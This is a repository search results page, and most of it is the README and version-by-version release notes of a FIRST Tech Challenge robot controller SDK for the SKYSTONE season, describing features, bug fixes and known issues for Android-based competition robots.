162 skills found · Page 1 of 6
Ebazhanov / Linkedin Skill Assessments QuizzesFull reference of LinkedIn answers 2024 for skill assessments (aws-lambda, rest-api, javascript, react, git, html, jquery, mongodb, java, Go, python, machine-learning, power-point) linkedin excel test lösungen, linkedin machine learning test LinkedIn test questions and answers
beedotkiran / Lidar For AD ReferencesA list of references on lidar point cloud processing for autonomous driving
chrisneagu / FTC Skystone Dark Angels Romania 2020NOTICE This repository contains the public FTC SDK for the SKYSTONE (2019-2020) competition season. If you are looking for the current season's FTC SDK software, please visit the new and permanent home of the public FTC SDK: FtcRobotController repository Welcome! This GitHub repository contains the source code that is used to build an Android app to control a FIRST Tech Challenge competition robot. To use this SDK, download/clone the entire project to your local computer. Getting Started If you are new to robotics or new to the FIRST Tech Challenge, then you should consider reviewing the FTC Blocks Tutorial to get familiar with how to use the control system: FTC Blocks Online Tutorial Even if you are an advanced Java programmer, it is helpful to start with the FTC Blocks tutorial, and then migrate to the OnBot Java Tool or to Android Studio afterwards. Downloading the Project If you are an Android Studio programmer, there are several ways to download this repo. Note that if you use the Blocks or OnBot Java Tool to program your robot, then you do not need to download this repository. If you are a git user, you can clone the most current version of the repository: git clone https://github.com/FIRST-Tech-Challenge/SKYSTONE.git Or, if you prefer, you can use the "Download Zip" button available through the main repository page. Downloading the project as a .ZIP file will keep the size of the download manageable. You can also download the project folder (as a .zip or .tar.gz archive file) from the Downloads subsection of the Releases page for this repository. Once you have downloaded and uncompressed (if needed) your folder, you can use Android Studio to import the folder ("Import project (Eclipse ADT, Gradle, etc.)"). Getting Help User Documentation and Tutorials FIRST maintains online documentation with information and tutorials on how to use the FIRST Tech Challenge software and robot control system. You can access this documentation using the following link: SKYSTONE Online Documentation Note that the online documentation is an "evergreen" document that is constantly being updated and edited. It contains the most current information about the FIRST Tech Challenge software and control system. Javadoc Reference Material The Javadoc reference documentation for the FTC SDK is now available online. Click on the following link to view the FTC SDK Javadoc documentation as a live website: FTC Javadoc Documentation Documentation for the FTC SDK is also included with this repository. There is a subfolder called "doc" which contains several subfolders: The folder "apk" contains the .apk files for the FTC Driver Station and FTC Robot Controller apps. The folder "javadoc" contains the JavaDoc user documentation for the FTC SDK. Online User Forum For technical questions regarding the Control System or the FTC SDK, please visit the FTC Technology forum: FTC Technology Forum Release Information Version 5.5 (20200824-090813) Version 5.5 requires Android Studio 4.0 or later. New features Adds support for calling custom Java classes from Blocks OpModes (fixes SkyStone issue #161). Classes must be in the org.firstinspires.ftc.teamcode package. Methods must be public static and have no more than 21 parameters. Parameters declared as OpMode, LinearOpMode, Telemetry, and HardwareMap are supported and the argument is provided automatically, regardless of the order of the parameters. On the block, the sockets for those parameters are automatically filled in. Parameters declared as char or java.lang.Character will accept any block that returns text and will only use the first character in the text. Parameters declared as boolean or java.lang.Boolean will accept any block that returns boolean. Parameters declared as byte, java.lang.Byte, short, java.lang.Short, int, java.lang.Integer, long, or java.lang.Long, will accept any block that returns a number and will round that value to the nearest whole number. Parameters declared as float, java.lang.Float, double, java.lang.Double will accept any block that returns a number. Adds telemetry API method for setting display format Classic Monospace HTML (certain tags only) Adds blocks support for switching cameras. Adds Blocks support for TensorFlow Object Detection with a custom model. Adds support for uploading a custom TensorFlow Object Detection model in the Manage page, which is especially useful for Blocks and OnBotJava users. Shows new Control Hub blink codes when the WiFi band is switched using the Control Hub's button (only possible on Control Hub OS 1.1.2) Adds new warnings which can be disabled in the Advanced RC Settings Mismatched app versions warning Unnecessary 2.4 GHz WiFi usage warning REV Hub is running outdated firmware (older than version 1.8.2) Adds support for Sony PS4 gamepad, and reworks how gamepads work on the Driver Station Removes preference which sets gamepad type based on driver position. Replaced with menu which allows specifying type for gamepads with unknown VID and PID Attempts to auto-detect gamepad type based on USB VID and PID If gamepad VID and PID is not known, use type specified by user for that VID and PID If gamepad VID and PID is not known AND the user has not specified a type for that VID and PID, an educated guess is made about how to map the gamepad Driver Station will now attempt to automatically recover from a gamepad disconnecting, and re-assign it to the position it was assigned to when it dropped If only one gamepad is assigned and it drops: it can be recovered If two gamepads are assigned, and have different VID/PID signatures, and only one drops: it will be recovered If two gamepads are assigned, and have different VID/PID signatures, and BOTH drop: both will be recovered If two gamepads are assigned, and have the same VID/PID signatures, and only one drops: it will be recovered If two gamepads are assigned, and have the same VID/PID signatures, and BOTH drop: neither will be recovered, because of the ambiguity of the gamepads when they re-appear on the USB bus. There is currently one known edge case: if there are two gamepads with the same VID/PID signature plugged in, but only one is assigned, and they BOTH drop, it's a 50-50 chance of which one will be chosen for automatic recovery to the assigned position: it is determined by whichever one is re-enumerated first by the USB bus controller. Adds landscape user interface to Driver Station New feature: practice timer with audio cues New feature (Control Hub only): wireless network connection strength indicator (0-5 bars) New feature (Control Hub only): tapping on the ping/channel display will switch to an alternate display showing radio RX dBm and link speed (tap again to switch back) The layout will NOT autorotate. You can switch the layout from the Driver Station's settings menu. Breaking changes Removes support for Android versions 4.4 through 5.1 (KitKat and Lollipop). The minSdkVersion is now 23. Removes the deprecated LinearOpMode methods waitOneFullHardwareCycle() and waitForNextHardwareCycle() Enhancements Handles RS485 address of Control Hub automatically The Control Hub is automatically given a reserved address Existing configuration files will continue to work All addresses in the range of 1-10 are still available for Expansion Hubs The Control Hub light will now normally be solid green, without blinking to indicate the address The Control Hub will not be shown on the Expansion Hub Address Change settings page Improves REV Hub firmware updater The user can now choose between all available firmware update files Version 1.8.2 of the REV Hub firmware is bundled into the Robot Controller app. Text was added to clarify that Expansion Hubs can only be updated via USB. Firmware update speed was reduced to improve reliability Allows REV Hub firmware to be updated directly from the Manage webpage Improves log viewer on Robot Controller Horizontal scrolling support (no longer word wrapped) Supports pinch-to-zoom Uses a monospaced font Error messages are highlighted New color scheme Attempts to force-stop a runaway/stuck OpMode without restarting the entire app Not all types of runaway conditions are stoppable, but if the user code attempts to talk to hardware during the runaway, the system should be able to capture it. Makes various tweaks to the Self Inspect screen Renames "OS version" entry to "Android version" Renames "WiFi Direct Name" to "WiFi Name" Adds Control Hub OS version, when viewing the report of a Control Hub Hides the airplane mode entry, when viewing the report of a Control Hub Removes check for ZTE Speed Channel Changer Shows firmware version for all Expansion and Control Hubs Reworks network settings portion of Manage page All network settings are now applied with a single click The WiFi Direct channel of phone-based Robot Controllers can now be changed from the Manage page WiFi channels are filtered by band (2.4 vs 5 GHz) and whether they overlap with other channels The current WiFi channel is pre-selected on phone-based Robot Controllers, and Control Hubs running OS 1.1.2 or later. On Control Hubs running OS 1.1.2 or later, you can choose to have the system automatically select a channel on the 5 GHz band Improves OnBotJava New light and dark themes replace the old themes (chaos, github, chrome,...) the new default theme is light and will be used when you first update to this version OnBotJava now has a tabbed editor Read-only offline mode Improves function of "exit" menu item on Robot Controller and Driver Station Now guaranteed to be fully stopped and unloaded from memory Shows a warning message if a LinearOpMode exists prematurely due to failure to monitor for the start condition Improves error message shown when the Driver Station and Robot Controller are incompatible with each other Driver Station OpMode Control Panel now disabled while a Restart Robot is in progress Disables advanced settings related to WiFi direct when the Robot Controller is a Control Hub. Tint phone battery icons on Driver Station when low/critical. Uses names "Control Hub Portal" and "Control Hub" (when appropriate) in new configuration files Improve I2C read performance Very large improvement on Control Hub; up to ~2x faster with small (e.g. 6 byte) reads Not as apparent on Expansion Hubs connected to a phone Update/refresh build infrastructure Update to 'androidx' support library from 'com.android.support:appcompat', which is end-of-life Update targetSdkVersion and compileSdkVersion to 28 Update Android Studio's Android plugin to latest Fix reported build timestamp in 'About' screen Add sample illustrating manual webcam use: ConceptWebcam Bug fixes Fixes SkyStone issue #248 Fixes SkyStone issue #232 and modifies bulk caching semantics to allow for cache-preserving MANUAL/AUTO transitions. Improves performance when REV 2M distance sensor is unplugged Improves readability of Toast messages on certain devices Allows a Driver Station to connect to a Robot Controller after another has disconnected Improves generation of fake serial numbers for UVC cameras which do not provide a real serial number Previously some devices would assign such cameras a serial of 0:0 and fail to open and start streaming Fixes ftc_app issue #638. Fixes a slew of bugs with the Vuforia camera monitor including: Fixes bug where preview could be displayed with a wonky aspect ratio Fixes bug where preview could be cut off in landscape Fixes bug where preview got totally messed up when rotating phone Fixes bug where crosshair could drift off target when using webcams Fixes issue in UVC driver on some devices (ftc_app 681) if streaming was started/stopped multiple times in a row Issue manifested as kernel panic on devices which do not have this kernel patch. On affected devices which do have the patch, the issue was manifest as simply a failure to start streaming. The Tech Team believes that the root cause of the issue is a bug in the Linux kernel XHCI driver. A workaround was implemented in the SDK UVC driver. Fixes bug in UVC driver where often half the frames from the camera would be dropped (e.g. only 15FPS delivered during a streaming session configured for 30FPS). Fixes issue where TensorFlow Object Detection would show results whose confidence was lower than the minimum confidence parameter. Fixes a potential exploitation issue of CVE-2019-11358 in OnBotJava Fixes changing the address of an Expansion Hub with additional Expansion Hubs connected to it Preserves the Control Hub's network connection when "Restart Robot" is selected Fixes issue where device scans would fail while the Robot was restarting Fix RenderScript usage Use androidx.renderscript variant: increased compatibility Use RenderScript in Java mode, not native: simplifies build Fixes webcam-frame-to-bitmap conversion problem: alpha channel wasn't being initialized, only R, G, & B Fixes possible arithmetic overflow in Deadline Fixes deadlock in Vuforia webcam support which could cause 5-second delays when stopping OpMode Version 5.4 (20200108-101156) Fixes SkyStone issue #88 Adds an inspection item that notes when a robot controller (Control Hub) is using the factory default password. Fixes SkyStone issue #61 Fixes SkyStone issue #142 Fixes ftc_app issue #417 by adding more current and voltage monitoring capabilities for REV Hubs. Fixes a crash sometimes caused by OnBotJava activity Improves OnBotJava autosave functionality ftc_app #738 Fixes system responsiveness issue when an Expansion Hub is disconnected Fixes issue where IMU initialization could prevent Op Modes from stopping Fixes issue where AndroidTextToSpeech.speak() would fail if it was called too early Adds telemetry.speak() methods and blocks, which cause the Driver Station (if also updated) to speak text Adds and improves Expansion Hub-related warnings Improves Expansion Hub low battery warning Displays the warning immediately after the hub reports it Specifies whether the condition is current or occurred temporarily during an OpMode run Displays which hubs reported low battery Displays warning when hub loses and regains power during an OpMode run Fixes the hub's LED pattern after this condition Displays warning when Expansion Hub is not responding to commands Specifies whether the condition is current or occurred temporarily during an OpMode run Clarifies warning when Expansion Hub is not present at startup Specifies that this condition requires a Robot Restart before the hub can be used. The hub light will now accurately reflect this state Improves logging and reduces log spam during these conditions Syncs the Control Hub time and timezone to a connected web browser programming the robot, if a Driver Station is not available. Adds bulk read functionality for REV Hubs A bulk caching mode must be set at the Hub level with LynxModule#setBulkCachingMode(). This applies to all relevant SDK hardware classes that reference that Hub. The following following Hub bulk caching modes are available: BulkCachingMode.OFF (default): All hardware calls operate as usual. Bulk data can read through LynxModule#getBulkData() and processed manually. BulkCachingMode.AUTO: Applicable hardware calls are served from a bulk read cache that is cleared/refreshed automatically to ensure identical commands don't hit the same cache. The cache can also be cleared manually with LynxModule#clearBulkCache(), although this is not recommended. (advanced users) BulkCachingMode.MANUAL: Same as BulkCachingMode.AUTO except the cache is never cleared automatically. To avoid getting stale data, the cache must be manually cleared at the beginning of each loop body or as the user deems appropriate. Removes PIDF Annotation values added in Rev 5.3 (to AndyMark, goBILDA and TETRIX motor configurations). The new motor types will still be available but their Default control behavior will revert back to Rev 5.2 Adds new ConceptMotorBulkRead sample Opmode to demonstrate and compare Motor Bulk-Read modes for reducing I/O latencies. Version 5.3 (20191004-112306) Fixes external USB/UVC webcam support Makes various bugfixes and improvements to Blocks page, including but not limited to: Many visual tweaks Browser zoom and window resize behave better Resizing the Java preview pane works better and more consistently across browsers The Java preview pane consistently gets scrollbars when needed The Java preview pane is hidden by default on phones Internet Explorer 11 should work Large dropdown lists display properly on lower res screens Disabled buttons are now visually identifiable as disabled A warning is shown if a user selects a TFOD sample, but their device is not compatible Warning messages in a Blocks op mode are now visible by default. Adds goBILDA 5201 and 5202 motors to Robot Configurator Adds PIDF Annotation values to AndyMark, goBILDA and TETRIX motor configurations. This has the effect of causing the RUN_USING_ENCODERS and RUN_TO_POSITION modes to use PIDF vs PID closed loop control on these motors. This should provide more responsive, yet stable, speed control. PIDF adds Feedforward control to the basic PID control loop. Feedforward is useful when controlling a motor's speed because it "anticipates" how much the control voltage must change to achieve a new speed set-point, rather than requiring the integrated error to change sufficiently. The PIDF values were chosen to provide responsive, yet stable, speed control on a lightly loaded motor. The more heavily a motor is loaded (drag or friction), the more noticable the PIDF improvement will be. Fixes startup crash on Android 10 Fixes ftc_app issue #712 (thanks to FROGbots-4634) Fixes ftc_app issue #542 Allows "A" and lowercase letters when naming device through RC and DS apps. Version 5.2 (20190905-083277) Fixes extra-wide margins on settings activities, and placement of the new configuration button Adds Skystone Vuforia image target data. Includes sample Skystone Vuforia Navigation op modes (Java). Includes sample Skystone Vuforia Navigation op modes (Blocks). Adds TensorFlow inference model (.tflite) for Skystone game elements. Includes sample Skystone TensorFlow op modes (Java). Includes sample Skystone TensorFlow op modes (Blocks). Removes older (season-specific) sample op modes. Includes 64-bit support (to comply with Google Play requirements). Protects against Stuck OpModes when a Restart Robot is requested. (Thanks to FROGbots-4634) (ftc_app issue #709) Blocks related changes: Fixes bug with blocks generated code when hardware device name is a java or javascript reserved word. Shows generated java code for blocks, even when hardware items are missing from the active configuration. Displays warning icon when outdated Vuforia and TensorFlow blocks are used (SkyStone issue #27) Version 5.1 (20190820-222104) Defines default PIDF parameters for the following motors: REV Core Hex Motor REV 20:1 HD Hex Motor REV 40:1 HD Hex Motor Adds back button when running on a device without a system back button (such as a Control Hub) Allows a REV Control Hub to update the firmware on a REV Expansion Hub via USB Fixes SkyStone issue #9 Fixes ftc_app issue #715 Prevents extra DS User clicks by filtering based on current state. Prevents incorrect DS UI state changes when receiving new OpMode list from RC Adds support for REV Color Sensor V3 Adds a manual-refresh DS Camera Stream for remotely viewing RC camera frames. To show the stream on the DS, initialize but do not run a stream-enabled opmode, select the Camera Stream option in the DS menu, and tap the image to refresh. This feature is automatically enabled when using Vuforia or TFOD—no additional RC configuration is required for typical use cases. To hide the stream, select the same menu item again. Note that gamepads are disabled and the selected opmode cannot be started while the stream is open as a safety precaution. To use custom streams, consult the API docs for CameraStreamServer#setSource and CameraStreamSource. Adds many Star Wars sounds to RobotController resources. Added SKYSTONE Sounds Chooser Sample Program. Switches out startup, connect chimes, and error/warning sounds for Star Wars sounds Updates OnBot Java to use a WebSocket for communication with the robot The OnBot Java page no longer has to do a full refresh when a user switches from editing one file to another Known issues: Camera Stream The Vuforia camera stream inherits the issues present in the phone preview (namely ftc_app issue #574). This problem does not affect the TFOD camera stream even though it receives frames from Vuforia. The orientation of the stream frames may not always match the phone preview. For now, these frames may be rotated manually via a custom CameraStreamSource if desired. OnBotJava Browser back button may not always work correctly It's possible for a build to be queued, but not started. The OnBot Java build console will display a warning if this occurs. A user might not realize they are editing a different file if the user inadvertently switches from one file to another since this switch is now seamless. The name of the currently open file is displayed in the browser tab. Version 5.0 (built on 19.06.14) Support for the REV Robotics Control Hub. Adds a Java preview pane to the Blocks editor. Adds a new offline export feature to the Blocks editor. Display wifi channel in Network circle on Driver Station. Adds calibration for Logitech C270 Updates build tooling and target SDK. Compliance with Google's permissions infrastructure (Required after build tooling update). Keep Alives to mitigate the Motorola wifi scanning problem. Telemetry substitute no longer necessary. Improves Vuforia error reporting. Fixes ftctechnh/ftc_app issues 621, 713. Miscellaneous bug fixes and improvements. Version 4.3 (built on 18.10.31) Includes missing TensorFlow-related libraries and files. Version 4.2 (built on 18.10.30) Includes fix to avoid deadlock situation with WatchdogMonitor which could result in USB communication errors. Comm error appeared to require that user disconnect USB cable and restart the Robot Controller app to recover. robotControllerLog.txt would have error messages that included the words "E RobotCore: lynx xmit lock: #### abandoning lock:" Includes fix to correctly list the parent module address for a REV Robotics Expansion Hub in a configuration (.xml) file. Bug in versions 4.0 and 4.1 would incorrect list the address module for a parent REV Robotics device as "1". If the parent module had a higher address value than the daisy-chained module, then this bug would prevent the Robot Controller from communicating with the downstream Expansion Hub. Added requirement for ACCESS_COARSE_LOCATION to allow a Driver Station running Android Oreo to scan for Wi-Fi Direct devices. Added google() repo to build.gradle because aapt2 must be downloaded from the google() repository beginning with version 3.2 of the Android Gradle Plugin. Important Note: Android Studio users will need to be connected to the Internet the first time build the ftc_app project. Internet connectivity is required for the first build so the appropriate files can be downloaded from the Google repository. Users should not need to be connected to the Internet for subsequent builds. This should also fix buid issue where Android Studio would complain that it "Could not find com.android.tools.lint:lint-gradle:26.1.4" (or similar). Added support for REV Spark Mini motor controller as part of the configuration menu for a servo/PWM port on the REV Expansion Hub. Provide examples for playing audio files in an Op Mode. Block Development Tool Changes Includes a fix for a problem with the Velocity blocks that were reported in the FTC Technology forum (Blocks Programming subforum). Change the "Save completed successfully." message to a white color so it will contrast with a green background. Fixed the "Download image" feature so it will work if there are text blocks in the op mode. Introduce support for Google's TensorFlow Lite technology for object detetion for 2018-2019 game. TensorFlow lite can recognize Gold Mineral and Silver Mineral from 2018-2019 game. Example Java and Block op modes are included to show how to determine the relative position of the gold block (left, center, right). Version 4.1 (released on 18.09.24) Changes include: Fix to prevent crash when deprecated configuration annotations are used. Change to allow FTC Robot Controller APK to be auto-updated using FIRST Global Control Hub update scripts. Removed samples for non supported / non legal hardware. Improvements to Telemetry.addData block with "text" socket. Updated Blocks sample op mode list to include Rover Ruckus Vuforia example. Update SDK library version number. Version 4.0 (released on 18.09.12) Changes include: Initial support for UVC compatible cameras If UVC camera has a unique serial number, RC will detect and enumerate by serial number. If UVC camera lacks a unique serial number, RC will only support one camera of that type connected. Calibration settings for a few cameras are included (see TeamCode/src/main/res/xml/teamwebcamcalibrations.xml for details). User can upload calibration files from Program and Manage web interface. UVC cameras seem to draw a fair amount of electrical current from the USB bus. This does not appear to present any problems for the REV Robotics Control Hub. This does seem to create stability problems when using some cameras with an Android phone-based Robot Controller. FTC Tech Team is investigating options to mitigate this issue with the phone-based Robot Controllers. Updated sample Vuforia Navigation and VuMark Op Modes to demonstrate how to use an internal phone-based camera and an external UVC webcam. Support for improved motor control. REV Robotics Expansion Hub firmware 1.8 and greater will support a feed forward mechanism for closed loop motor control. FTC SDK has been modified to support PIDF coefficients (proportional, integral, derivative, and feed forward). FTC Blocks development tool modified to include PIDF programming blocks. Deprecated older PID-related methods and variables. REV's 1.8.x PIDF-related changes provide a more linear and accurate way to control a motor. Wireless Added 5GHz support for wireless channel changing for those devices that support it. Tested with Moto G5 and E4 phones. Also tested with other (currently non-approved) phones such as Samsung Galaxy S8. Improved Expansion Hub firmware update support in Robot Controller app Changes to make the system more robust during the firmware update process (when performed through Robot Controller app). User no longer has to disconnect a downstream daisy-chained Expansion Hub when updating an Expansion Hub's firmware. If user is updating an Expansion Hub's firmware through a USB connection, he/she does not have to disconnect RS485 connection to other Expansion Hubs. The user still must use a USB connection to update an Expansion Hub's firmware. The user cannot update the Expansion Hub firmware for a downstream device that is daisy chained through an RS485 connection. If an Expansion Hub accidentally gets "bricked" the Robot Controller app is now more likely to recognize the Hub when it scans the USB bus. Robot Controller app should be able to detect an Expansion Hub, even if it accidentally was bricked in a previous update attempt. Robot Controller app should be able to install the firmware onto the Hub, even if if accidentally was bricked in a previous update attempt. Resiliency FTC software can detect and enable an FTDI reset feature that is available with REV Robotics v1.8 Expansion Hub firmware and greater. When enabled, the Expansion Hub can detect if it hasn't communicated with the Robot Controller over the FTDI (USB) connection. If the Hub hasn't heard from the Robot Controller in a while, it will reset the FTDI connection. This action helps system recover from some ESD-induced disruptions. Various fixes to improve reliability of FTC software. Blocks Fixed errors with string and list indices in blocks export to java. Support for USB connected UVC webcams. Refactored optimized Blocks Vuforia code to support Rover Ruckus image targets. Added programming blocks to support PIDF (proportional, integral, derivative and feed forward) motor control. Added formatting options (under Telemetry and Miscellaneous categories) so user can set how many decimal places to display a numerical value. Support to play audio files (which are uploaded through Blocks web interface) on Driver Station in addition to the Robot Controller. Fixed bug with Download Image of Blocks feature. Support for REV Robotics Blinkin LED Controller. Support for REV Robotics 2m Distance Sensor. Added support for a REV Touch Sensor (no longer have to configure as a generic digital device). Added blocks for DcMotorEx methods. These are enhanced methods that you can use when supported by the motor controller hardware. The REV Robotics Expansion Hub supports these enhanced methods. Enhanced methods include methods to get/set motor velocity (in encoder pulses per second), get/set PIDF coefficients, etc.. Modest Improvements in Logging Decrease frequency of battery checker voltage statements. Removed non-FTC related log statements (wherever possible). Introduced a "Match Logging" feature. Under "Settings" a user can enable/disable this feature (it's disabled by default). If enabled, user provides a "Match Number" through the Driver Station user interface (top of the screen). The Match Number is used to create a log file specifically with log statements from that particular Op Mode run. Match log files are stored in /sdcard/FIRST/matlogs on the Robot Controller. Once an op mode run is complete, the Match Number is cleared. This is a convenient way to create a separate match log with statements only related to a specific op mode run. New Devices Support for REV Robotics Blinkin LED Controller. Support for REV Robotics 2m Distance Sensor. Added configuration option for REV 20:1 HD Hex Motor. Added support for a REV Touch Sensor (no longer have to configure as a generic digital device). Miscellaneous Fixed some errors in the definitions for acceleration and velocity in our javadoc documentation. Added ability to play audio files on Driver Station When user is configuring an Expansion Hub, the LED on the Expansion Hub will change blink pattern (purple-cyan) to indicate which Hub is currently being configured. Renamed I2cSensorType to I2cDeviceType. Added an external sample Op Mode that demonstrates localization using 2018-2019 (Rover Ruckus presented by QualComm) Vuforia targets. Added an external sample Op Mode that demonstrates how to use the REV Robotics 2m Laser Distance Sensor. Added an external sample Op Mode that demonstrates how to use the REV Robotics Blinkin LED Controller. Re-categorized external Java sample Op Modes to "TeleOp" instead of "Autonomous". Known issues: Initial support for UVC compatible cameras UVC cameras seem to draw significant amount of current from the USB bus. This does not appear to present any problems for the REV Robotics Control Hub. This does seem to create stability problems when using some cameras with an Android phone-based Robot Controller. FTC Tech Team is investigating options to mitigate this issue with the phone-based Robot Controllers. There might be a possible deadlock which causes the RC to become unresponsive when using a UVC webcam with a Nougat Android Robot Controller. Wireless When user selects a wireless channel, this channel does not necessarily persist if the phone is power cycled. Tech Team is hoping to eventually address this issue in a future release. Issue has been present since apps were introduced (i.e., it is not new with the v4.0 release). Wireless channel is not currently displayed for WiFi Direct connections. Miscellaneous The blink indication feature that shows which Expansion Hub is currently being configured does not work for a newly created configuration file. User has to first save a newly created configuration file and then close and re-edit the file in order for blink indicator to work. Version 3.6 (built on 17.12.18) Changes include: Blocks Changes Uses updated Google Blockly software to allow users to edit their op modes on Apple iOS devices (including iPad and iPhone). Improvement in Blocks tool to handle corrupt op mode files. Autonomous op modes should no longer get switched back to tele-op after re-opening them to be edited. The system can now detect type mismatches during runtime and alert the user with a message on the Driver Station. Updated javadoc documentation for setPower() method to reflect correct range of values (-1 to +1). Modified VuforiaLocalizerImpl to allow for user rendering of frames Added a user-overrideable onRenderFrame() method which gets called by the class's renderFrame() method. Version 3.5 (built on 17.10.30) Changes with version 3.5 include: Introduced a fix to prevent random op mode stops, which can occur after the Robot Controller app has been paused and then resumed (for example, when a user temporarily turns off the display of the Robot Controller phone, and then turns the screen back on). Introduced a fix to prevent random op mode stops, which were previously caused by random peer disconnect events on the Driver Station. Fixes issue where log files would be closed on pause of the RC or DS, but not re-opened upon resume. Fixes issue with battery handler (voltage) start/stop race. Fixes issue where Android Studio generated op modes would disappear from available list in certain situations. Fixes problem where OnBot Java would not build on REV Robotics Control Hub. Fixes problem where OnBot Java would not build if the date and time on the Robot Controller device was "rewound" (set to an earlier date/time). Improved error message on OnBot Java that occurs when renaming a file fails. Removed unneeded resources from android.jar binaries used by OnBot Java to reduce final size of Robot Controller app. Added MR_ANALOG_TOUCH_SENSOR block to Blocks Programming Tool. Version 3.4 (built on 17.09.06) Changes with version 3.4 include: Added telemetry.update() statement for BlankLinearOpMode template. Renamed sample Block op modes to be more consistent with Java samples. Added some additional sample Block op modes. Reworded OnBot Java readme slightly. Version 3.3 (built on 17.09.04) This version of the software includes improves for the FTC Blocks Programming Tool and the OnBot Java Programming Tool. Changes with verion 3.3 include: Android Studio ftc_app project has been updated to use Gradle Plugin 2.3.3. Android Studio ftc_app project is already using gradle 3.5 distribution. Robot Controller log has been renamed to /sdcard/RobotControllerLog.txt (note that this change was actually introduced w/ v3.2). Improvements in I2C reliability. Optimized I2C read for REV Expansion Hub, with v1.7 firmware or greater. Updated all external/samples (available through OnBot and in Android project folder). Vuforia Added support for VuMarks that will be used for the 2017-2018 season game. Blocks Update to latest Google Blockly release. Sample op modes can be selected as a template when creating new op mode. Fixed bug where the blocks would disappear temporarily when mouse button is held down. Added blocks for Range.clip and Range.scale. User can now disable/enable Block op modes. Fix to prevent occasional Blocks deadlock. OnBot Java Significant improvements with autocomplete function for OnBot Java editor. Sample op modes can be selected as a template when creating new op mode. Fixes and changes to complete hardware setup feature. Updated (and more useful) onBot welcome message. Known issues: Android Studio After updating to the new v3.3 Android Studio project folder, if you get error messages indicating "InvalidVirtualFileAccessException" then you might need to do a File->Invalidate Caches / Restart to clear the error. OnBot Java Sometimes when you push the build button to build all op modes, the RC returns an error message that the build failed. If you press the build button a second time, the build typically suceeds. Version 3.2 (built on 17.08.02) This version of the software introduces the "OnBot Java" Development Tool. Similar to the FTC Blocks Development Tool, the FTC OnBot Java Development Tool allows a user to create, edit and build op modes dynamically using only a Javascript-enabled web browser. The OnBot Java Development Tool is an integrated development environment (IDE) that is served up by the Robot Controller. Op modes are created and edited using a Javascript-enabled browser (Google Chromse is recommended). Op modes are saved on the Robot Controller Android device directly. The OnBot Java Development Tool provides a Java programming environment that does NOT need Android Studio. Changes with version 3.2 include: Enhanced web-based development tools Introduction of OnBot Java Development Tool. Web-based programming and management features are "always on" (user no longer needs to put Robot Controller into programming mode). Web-based management interface (where user can change Robot Controller name and also easily download Robot Controller log file). OnBot Java, Blocks and Management features available from web based interface. Blocks Programming Development Tool: Changed "LynxI2cColorRangeSensor" block to "REV Color/range sensor" block. Fixed tooltip for ColorSensor.isLightOn block. Added blocks for ColorSensor.getNormalizedColors and LynxI2cColorRangeSensor.getNormalizedColors. Added example op modes for digital touch sensor and REV Robotics Color Distance sensor. User selectable color themes. Includes many minor enhancements and fixes (too numerous to list). Known issues: Auto complete function is incomplete and does not support the following (for now): Access via this keyword Access via super keyword Members of the super cloass, not overridden by the class Any methods provided in the current class Inner classes Can't handle casted objects Any objects coming from an parenthetically enclosed expression Version 3.10 (built on 17.05.09) This version of the software provides support for the REV Robotics Expansion Hub. This version also includes improvements in the USB communication layer in an effort to enhance system resiliency. If you were using a 2.x version of the software previously, updating to version 3.1 requires that you also update your Driver Station software in addition to updating the Robot Controller software. Also note that in version 3.10 software, the setMaxSpeed and getMaxSpeed methods are no longer available (not deprecated, they have been removed from the SDK). Also note that the the new 3.x software incorporates motor profiles that a user can select as he/she configures the robot. Changes include: Blocks changes Added VuforiaTrackableDefaultListener.getPose and Vuforia.trackPose blocks. Added optimized blocks support for Vuforia extended tracking. Added atan2 block to the math category. Added useCompetitionFieldTargetLocations parameter to Vuforia.initialize block. If set to false, the target locations are placed at (0,0,0) with target orientation as specified in https://github.com/gearsincorg/FTCVuforiaDemo/blob/master/Robot_Navigation.java tutorial op mode. Incorporates additional improvements to USB comm layer to improve system resiliency (to recover from a greater number of communication disruptions). Additional Notes Regarding Version 3.00 (built on 17.04.13) In addition to the release changes listed below (see section labeled "Version 3.00 (built on 17.04.013)"), version 3.00 has the following important changes: Version 3.00 software uses a new version of the FTC Robocol (robot protocol). If you upgrade to v3.0 on the Robot Controller and/or Android Studio side, you must also upgrade the Driver Station software to match the new Robocol. Version 3.00 software removes the setMaxSpeed and getMaxSpeed methods from the DcMotor class. If you have an op mode that formerly used these methods, you will need to remove the references/calls to these methods. Instead, v3.0 provides the max speed information through the use of motor profiles that are selected by the user during robot configuration. Version 3.00 software currently does not have a mechanism to disable extra i2c sensors. We hope to re-introduce this function with a release in the near future. Version 3.00 (built on 17.04.13) *** Use this version of the software at YOUR OWN RISK!!! *** This software is being released as an "alpha" version. Use this version at your own risk! This pre-release software contains SIGNIFICANT changes, including changes to the Wi-Fi Direct pairing mechanism, rewrites of the I2C sensor classes, changes to the USB/FTDI layer, and the introduction of support for the REV Robotics Expansion Hub and the REV Robotics color-range-light sensor. These changes were implemented to improve the reliability and resiliency of the FTC control system. Please note, however, that version 3.00 is considered "alpha" code. This code is being released so that the FIRST community will have an opportunity to test the new REV Expansion Hub electronics module when it becomes available in May. The developers do not recommend using this code for critical applications (i.e., competition use). *** Use this version of the software at YOUR OWN RISK!!! *** Changes include: Major rework of sensor-related infrastructure. Includes rewriting sensor classes to implement synchronous I2C communication. Fix to reset Autonomous timer back to 30 seconds. Implementation of specific motor profiles for approved 12V motors (includes Tetrix, AndyMark, Matrix and REV models). Modest improvements to enhance Wi-Fi P2P pairing. Fixes telemetry log addition race. Publishes all the sources (not just a select few). Includes Block programming improvements Addition of optimized Vuforia blocks. Auto scrollbar to projects and sounds pages. Fixed blocks paste bug. Blocks execute after while-opModeIsActive loop (to allow for cleanup before exiting op mode). Added gyro integratedZValue block. Fixes bug with projects page for Firefox browser. Added IsSpeaking block to AndroidTextToSpeech. Implements support for the REV Robotics Expansion Hub Implements support for integral REV IMU (physically installed on I2C bus 0, uses same Bosch BNO055 9 axis absolute orientation sensor as Adafruit 9DOF abs orientation sensor). - Implements support for REV color/range/light sensor. Provides support to update Expansion Hub firmware through FTC SDK. Detects REV firmware version and records in log file. Includes support for REV Control Hub (note that the REV Control Hub is not yet approved for FTC use). Implements FTC Blocks programming support for REV Expansion Hub and sensor hardware. Detects and alerts when I2C device disconnect. Version 2.62 (built on 17.01.07) Added null pointer check before calling modeToByte() in finishModeSwitchIfNecessary method for ModernRoboticsUsbDcMotorController class. Changes to enhance Modern Robotics USB protocol robustness. Version 2.61 (released on 16.12.19) Blocks Programming mode changes: Fix to correct issue when an exception was thrown because an OpticalDistanceSensor object appears twice in the hardware map (the second time as a LightSensor). Version 2.6 (released on 16.12.16) 